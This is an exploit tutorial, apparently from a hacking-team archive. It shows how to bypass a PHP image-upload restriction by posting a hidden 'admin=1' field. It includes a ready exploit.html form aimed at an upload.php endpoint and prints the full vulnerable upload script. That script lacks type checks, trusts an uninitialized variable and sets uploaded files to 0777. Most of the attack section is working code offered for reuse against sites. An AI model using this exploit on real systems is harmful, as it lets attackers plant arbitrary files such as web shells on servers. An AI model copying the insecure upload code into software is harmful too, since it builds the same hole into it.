###############################################################################
# [+]Title: [Bypassing UPLOAD Variable] #
###############################################################################
# [+] About : #
###############################################################################
# Written by : GlaDiaT0R #
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com / berrahal.ryadh[AT]gmail[DOT]com #
# Team : Tunisian Power Team ( DarkGh0st.Net ) #
###############################################################################
# [+] Summary: #
# [1]-Introduction #
# [2]-Detection #
# [3]-Exploiting.. #
# [4]-Vulnerable Source code #
###############################################################################
[1]-Introduction
The bypass of a vulnerable PHP Upload works the same way that the bypass connection vulnerable.
Indeed we find in both cases a variable so the value given will be used to authenticate the request and passed to accept.
It is therefore possible to reconstruct a post that contains the variable value + authentication and ensure that the file
be accepted some restrictions so the preset.
=======================================================
[2]-Detection
To know this vulnerability you must therefore be in possession of source code used (vulnerable code used in a site template in distribution or other method to access the vulnerable source code used)
And it's essential to know the variable and its value used to authenticate the request.
=======================================================
[3]-Exploiting..
In our example the upload verify a number of specific information to the file upload (pixel size - maximum and minimum) and attribute value "1" to the variable $ admin authentication to be used to upload the image.
it will suffice to reforme post containing a field named admin whose value is "1" to bypass the restriction of the upload v vulnerable.
----------
vuln :
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if ($admin == 1 ){
// UPLOAD
---
exploit.html :
<html>
<head>
<title>/null</title>
<meta name="generator" content="Web Editor">
</head>
<p><form action="http://website.com/upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload"><input type="hidden" name="admin" value="1">
<input type="submit" value="Upload!">
</form>
</form>
</body>
</html>
---
=======================================================
[4]-Vulnerable Source code
<?PHP
$max_size = 1000000;
$width_max = 2500;
$height_max = 2500;
$width_min = 0;
$height_min = 0;
$nom_file = $_FILES['fupload']['name'];
$taille = $_FILES['fupload']['size'];
$tmp = $_FILES['fupload']['tmp_name'];
$infos_img = getimagesize($_FILES['fupload']['tmp_name']);
if(isset($_FILES['fupload']))
{
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if ($admin == 1 ){
$slozka = "upload";
$cil = $slozka . "/" .$_FILES['fupload']['name'];
$nazev_souboru = $_FILES['fupload']['tmp_name'];
$copy = move_uploaded_file($nazev_souboru, $cil);
chmod ($cil, 0777);
echo "fichier " .$_FILES['fupload']['name']. " uploadé sur le server.\n
<a href=\"$cil\"><h2>votre fichier</h2>[/url]";
}
else
echo "ERROR" . $_FILES['fupload']['error'];
}
?>
<p><form action="upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload">
<input type="submit" value="Upload!">
</form>
----------
i think it's easy now to bypass any ulpoad variable if the source code is vulnerable ;)
any questions or suggestions ? contact me on the_gl4di4t0r[AT]hotmail[DOT]com